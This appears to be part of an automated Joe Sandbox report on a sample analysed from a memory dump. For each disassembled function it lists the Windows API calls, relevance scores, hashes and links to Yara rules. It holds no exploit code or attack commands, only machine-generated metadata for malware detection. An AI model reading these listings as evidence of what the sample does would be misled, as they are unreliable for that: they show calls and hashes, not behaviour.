Opcode ID: b3a511675dfd52642289cb7e37a9ab436dc99218163f4337eaef9fb4d0f00824
Instruction ID: ae86457c3dab6b0cfddaa3d1ce817abed0e58b0a8e2c0bb16c2c7efe7adf0eca
Opcode Fuzzy Hash: b3a511675dfd52642289cb7e37a9ab436dc99218163f4337eaef9fb4d0f00824
Instruction Fuzzy Hash: A851F1B1D00219AFCF14DFA9D9889EEFBB9FF88700B10412AE411B7250DB746E45CBA1

Function 00BE694C Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BE6965
_strlen.LIBCMT ref: 00BE6987

Part of subcall function 00BE5F34: _memmove_s.LIBCMT ref: 00BE5F45

Part of subcall function 00BD4880: _memcpy_s.LIBCMT ref: 00BD4891

_strlen.LIBCMT ref: 00BE69C7
_strlen.LIBCMT ref: 00BE6A88

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _strlen$_memcpy_s_memmove_s
String ID:
API String ID: 113752263-0
Opcode ID: 6ec74d25a9ea9bef82ad6509c8e5b3361476a9834b05d507c79fb9f3af07d058
Instruction ID: f6c0f8a44057c56b3bc4121d0be9fe4a2be9d3f1ad172eb04c5da878fade7477
Opcode Fuzzy Hash: 6ec74d25a9ea9bef82ad6509c8e5b3361476a9834b05d507c79fb9f3af07d058
Instruction Fuzzy Hash: 40418436D04269EFCF11DF99D884AAEBBF5EF58790B1481AAE804B7201D7346A40DF94

Function 00C082ED Relevance: 6.1, APIs: 4, Instructions: 137keyboardwindowCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000001), ref: 00C0832E
WindowFromPoint.USER32(?,?), ref: 00C0836E
SendMessageA.USER32(?,00000000,?,00000000), ref: 00C083E1
ScreenToClient.USER32(?,?), ref: 00C08442

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AsyncClientFromMessagePointScreenSendStateWindow
String ID:
API String ID: 227561881-0
Opcode ID: 38cdc1e28294d3f181eddbb497fb56e7859e1519a7ffe9afc736fc0e0bcb7847
Instruction ID: 12537b125d8fd06e88034b5509ed4af659020a1bde204e05e3d5a4e2a03754c3
Opcode Fuzzy Hash: 38cdc1e28294d3f181eddbb497fb56e7859e1519a7ffe9afc736fc0e0bcb7847
Instruction Fuzzy Hash: 99513371600206DFCF14DFA5C894ABEB7B5FF44700F148529F9A697290EF309A58DBA1

Function 00C447E7 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C447EE

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Part of subcall function 00BE276A: __EH_prolog3_catch.LIBCMT ref: 00BE2771

GetWindowRect.USER32(?,?), ref: 00C448E2
GetSystemMetrics.USER32(00000010), ref: 00C448F0
GetSystemMetrics.USER32(00000011), ref: 00C448FB

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$Exception@8H_prolog3H_prolog3_H_prolog3_catchRectThrowWindow
String ID:
API String ID: 3575448974-0
Opcode ID: 2c901b151d51361383568e83db291e4d32665094dd20328210ba07dfbbe1afb5
Instruction ID: 4cb9a93056626efada993e1ea778afb0cfe301844d00863288d906b8c59fd775
Opcode Fuzzy Hash: 2c901b151d51361383568e83db291e4d32665094dd20328210ba07dfbbe1afb5
Instruction Fuzzy Hash: 00416971A002099FCB14EFA8C995BEEBBF5FF48300F14447AF956AB291DB70A904CB50

Function 00C46A6E Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C46B50
EqualRect.USER32(?,?), ref: 00C46B76
BeginDeferWindowPos.USER32(?), ref: 00C46B83
EndDeferWindowPos.USER32(?), ref: 00C46BA9

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$DeferRect$BeginEqualException@8H_prolog3Throw
String ID:
API String ID: 2548128233-0
Opcode ID: b578d0ebf164d23e1908e2f3a0d75b3911a987a0785fb3a71e0a0b999e11cce0
Instruction ID: a07795ba6350da30db6631f7e348e2dc798bdcbc182b0533cc63f2ae27ef380a
Opcode Fuzzy Hash: b578d0ebf164d23e1908e2f3a0d75b3911a987a0785fb3a71e0a0b999e11cce0
Instruction Fuzzy Hash: 39414B71A002089FCF11DFA9C8849EEBBB9FF89710B14456AF502EB215DB71AA44DB61

Function 00BF51B4 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00BF5274
SetRectEmpty.USER32(?), ref: 00BF5281
SetRectEmpty.USER32(?), ref: 00BF532F
SetRectEmpty.USER32 ref: 00BF538C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: fdcbf97e262bdfe60fb65a9d163c9f8ce6bd85bd8c54b1a7819cf9529d138263
Instruction ID: 49723eb42c602f671798fcba56a87d9eec74b967920b844786c9d0620b01150e
Opcode Fuzzy Hash: fdcbf97e262bdfe60fb65a9d163c9f8ce6bd85bd8c54b1a7819cf9529d138263
Instruction Fuzzy Hash: BB518BB1805B858FC360CF3AC9816E7FAE9FFA4310F104A2FD1AAD2261D7B064859F11

Function 00BD5260 Relevance: 6.1, APIs: 4, Instructions: 119registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,91693692,?,?,?,?,00CDC8CC,000000FF), ref: 00BD5316
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,00CDC8CC,000000FF), ref: 00BD534F
RegCloseKey.ADVAPI32(?,?,?,?,?,00CDC8CC,000000FF), ref: 00BD536A
GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 00BD53D3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: QueryValue$ClosePrivateProfileString
String ID:
API String ID: 1042844925-0
Opcode ID: d7cb0dad4b067eab352c44d27cac21f63b5fcdba26f4a963ed155590cf5ec82f
Instruction ID: 8bef041ca0bc39ac962e498143043c03058e4aa790d124f3330f5d27a280eb08
Opcode Fuzzy Hash: d7cb0dad4b067eab352c44d27cac21f63b5fcdba26f4a963ed155590cf5ec82f
Instruction Fuzzy Hash: 72414F71D001A8AFCB319F14CC44ADEB7B8EB48760F1045DAF589A2250E7B45EC4DFA4

Function 00C38AA5 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C38B30
GetWindowRect.USER32(?,?), ref: 00C38B3D
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00C38B6A
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C38BD1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageRectSend$EmptyWindow
String ID:
API String ID: 1914275016-0
Opcode ID: b57bd4090ecdb03aba68c45b3e461a532a9b4b4c26d60760f1c5a64be00b30ac
Instruction ID: 0d92242c8eb65ff6d74862d756a288d90de6c671e27fe9905d1373b788987518
Opcode Fuzzy Hash: b57bd4090ecdb03aba68c45b3e461a532a9b4b4c26d60760f1c5a64be00b30ac
Instruction Fuzzy Hash: 7841297161020AAFDB109F69CC88EBEB7F9FF49304F14446AF55AD7250CB709E459BA0

Function 00C4645A Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C46490
GetWindowRect.USER32(?,?), ref: 00C46516
EqualRect.USER32(?,?), ref: 00C46524
GetParent.USER32(?), ref: 00C46535

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$EqualParent
String ID:
API String ID: 2870910800-0
Opcode ID: 3d573a17d4bcb4260deabc9a2cecdd1c9ddefb0e0458bd8313fccfbdc4a74a0e
Instruction ID: ac156428d66315c1aeb664f6ab6528ac943a0e487ee9de2fbf081784d9500df7
Opcode Fuzzy Hash: 3d573a17d4bcb4260deabc9a2cecdd1c9ddefb0e0458bd8313fccfbdc4a74a0e
Instruction Fuzzy Hash: DF415C71A00219DFDF14DFA4C988AAEB7F9FF49750F150169E919EB215DB30AE00CBA1

Function 00C0644B Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C06517
ClientToScreen.USER32(?,?), ref: 00C06527
IsWindow.USER32(?), ref: 00C06549
ClientToScreen.USER32(?,?), ref: 00C0657E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientScreenWindow
String ID:
API String ID: 1643562046-0
Opcode ID: d5ffe989f41efa201b273391980e1122b7714a3c3bb171350227cf445eb26011
Instruction ID: 0eed0dcdb1031dd52ebb579dc80d74ec9ae93f66cbd93550cee040d5b49052b3
Opcode Fuzzy Hash: d5ffe989f41efa201b273391980e1122b7714a3c3bb171350227cf445eb26011
Instruction Fuzzy Hash: 8D41AE71500601AFDF21DF94CD90EBEBBB9EF48340F10446AF9A5D65A4E635EE60EB10

Function 00C24C4E Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C24CDB
RedrawWindow.USER32(?,?,00000000,00000105), ref: 00C24CF6
IsRectEmpty.USER32(?), ref: 00C24D48
RedrawWindow.USER32(?,?,00000000,00000105), ref: 00C24D63

Part of subcall function 00C22918: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 00C22982

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: RedrawWindow$EmptyRect
String ID:
API String ID: 138230908-0
Opcode ID: 98a54c5dccc93b8400c56e1390241203e57770900414636de06b1935976fea75
Instruction ID: d9738c6359b2f3e517e5849eed51b91d0c8f18a73e93fd18a9248f92fa76f9ac
Opcode Fuzzy Hash: 98a54c5dccc93b8400c56e1390241203e57770900414636de06b1935976fea75
Instruction Fuzzy Hash: 32416B71A00629DFDF18DFA8E885BEE77BAEB48300F154079E905AF251D671AA41CB60

Function 00C06DCC Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C06E98
ClientToScreen.USER32(?,?), ref: 00C06EA8
IsWindow.USER32(?), ref: 00C06ECA
ClientToScreen.USER32(?,?), ref: 00C06EFF

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientScreenWindow
String ID:
API String ID: 1643562046-0
Opcode ID: 544f6d7b84eec616fe234598c2fadcce71de8544441ae2732416184c96520df3
Instruction ID: 7e7c4da9aa63d13ae88e13e87b1a6dfdccb57925b28e535bcc0a5a6816bf0b10
Opcode Fuzzy Hash: 544f6d7b84eec616fe234598c2fadcce71de8544441ae2732416184c96520df3
Instruction Fuzzy Hash: 5441A079500715AFDF209F94CC80ABEB7B9EF04740F14446AE9B5D61A1E735EEA0EB10

Function 00CD91B7 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CD91EB
__isleadbyte_l.LIBCMT ref: 00CD921E
MultiByteToWideChar.KERNEL32(00000080,00000009,00CC66EC,?,00000000,00000000,?,?,?,?,00CC66EC,00000000), ref: 00CD924F
MultiByteToWideChar.KERNEL32(00000080,00000009,00CC66EC,00000001,00000000,00000000,?,?,?,?,00CC66EC,00000000), ref: 00CD92BD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 787b3a55fcc317a028b5dc508ce28a30e3948daeda5e4286aaf3c04c01d4dbbb
Instruction ID: 3eccfaefa81cedd05ef500aaad217d4d2a33eec13c372f02f54da69dc135232e
Opcode Fuzzy Hash: 787b3a55fcc317a028b5dc508ce28a30e3948daeda5e4286aaf3c04c01d4dbbb
Instruction Fuzzy Hash: 2431B235A00286EFDF20DFA4C884EAE7BB5EF01310F15456AE6659B2A1E730DE40DB50

Function 00BFC56A Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Parent$MessageSend
String ID:
API String ID: 2251359880-0
Opcode ID: 7579ea3cd7dfdf228401b22a05bac015afa6dd706fddfe1c17d682f14e8d96a0
Instruction ID: d6b6d79d2bd402056bf94e27bb37346b6cf16997e8e192a332b340dad1ac2beb
Opcode Fuzzy Hash: 7579ea3cd7dfdf228401b22a05bac015afa6dd706fddfe1c17d682f14e8d96a0
Instruction Fuzzy Hash: 2B31B07160424DBFCB209F64CA84E6E7FF8FF88704B1045A9E246D7250DB309D99DB50

Function 00C4AEEA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 00C4AFA0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000014), ref: 00C4AFD6
InvalidateRect.USER32(?,00000000,00000001), ref: 00C4AFE0
UpdateWindow.USER32(?), ref: 00C4AFE7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$InvalidateRectUpdate
String ID:
API String ID: 1651931182-0
Opcode ID: 7a13aa1ec8df8d2b024328679e913c8224edab77d281f5f39aac1b17772913b4
Instruction ID: 41e0336a0365fefae476df4807698b5a791b0b07de869747079194295cbdb1c7
Opcode Fuzzy Hash: 7a13aa1ec8df8d2b024328679e913c8224edab77d281f5f39aac1b17772913b4
Instruction Fuzzy Hash: 953174B0580B04EFDF32CFA5C8849AAB7B4FB94351F24491EF56A86151E3309E84DB12

Function 00C2EF34 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C2EF5D
GetWindowRect.USER32(?,?), ref: 00C2EF94
GetClientRect.USER32(?,?), ref: 00C2EFB2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientEmptyWindow
String ID:
API String ID: 742297903-0
Opcode ID: 540d1168f64d44e6d96c733a88404bb1ef9b1a2c2335beb3c8fe5ed9101db259
Instruction ID: 0221e63512f93ab3a7bf462c47aa3972c6f9a618341d83fdaab4c59ac36c0083
Opcode Fuzzy Hash: 540d1168f64d44e6d96c733a88404bb1ef9b1a2c2335beb3c8fe5ed9101db259
Instruction Fuzzy Hash: F8310CB1600619EFCB04DFA9D984AAEB7F4FF08305B148569E51ADB651DB34ED00CBA1

Function 00C964F6 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C9654C
IsRectEmpty.USER32(?), ref: 00C96556
SetRectEmpty.USER32(?), ref: 00C965AD
SetRectEmpty.USER32(?), ref: 00C965B3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 4beebdfaaf319b784ea52511d76778c0d1d7f2629e1374ebe32abd098c5c70f3
Instruction ID: f14fb8f1223a7e3432e013428028d7d5275edbb3cf81b0f6b6ba402a9c12bfa9
Opcode Fuzzy Hash: 4beebdfaaf319b784ea52511d76778c0d1d7f2629e1374ebe32abd098c5c70f3
Instruction Fuzzy Hash: AC318F71900218DFCF11DFA8C9C49AEB7F8EF48B10B15406BE905AB18AD7719A85CF91

Function 00C496F6 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000015), ref: 00C49752
SetRectEmpty.USER32(?), ref: 00C497A9
SetRectEmpty.USER32(?), ref: 00C497B2
SetRectEmpty.USER32(?), ref: 00C497C1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyRect$MetricsSystem
String ID:
API String ID: 4159773870-0
Opcode ID: e5d63fbd7d5d409d174fc6ed61a783974d6c6b80042d19d0d98e09e995e7236e
Instruction ID: 8732c9080de636b0754e63ed7115fa32d3dd742d41b3be6803e9be31b85d59fd
Opcode Fuzzy Hash: e5d63fbd7d5d409d174fc6ed61a783974d6c6b80042d19d0d98e09e995e7236e
Instruction Fuzzy Hash: A9311871A105199FCF00DFA8C9C9AEE77B9FF45304F1801B9ED09AF145DA706A45CBA1

Function 00BFC215 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BFC240
PtInRect.USER32(?,?,?), ref: 00BFC264

Part of subcall function 00BFB87F: ScreenToClient.USER32(?,?), ref: 00BFB89C
Part of subcall function 00BFB87F: GetParent.USER32(?), ref: 00BFB8B3

MapWindowPoints.USER32(?,?,?,00000001), ref: 00BFC28F
SendMessageA.USER32(?,00000202,?,?), ref: 00BFC2AE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientRect$MessageParentPointsScreenSendWindow
String ID:
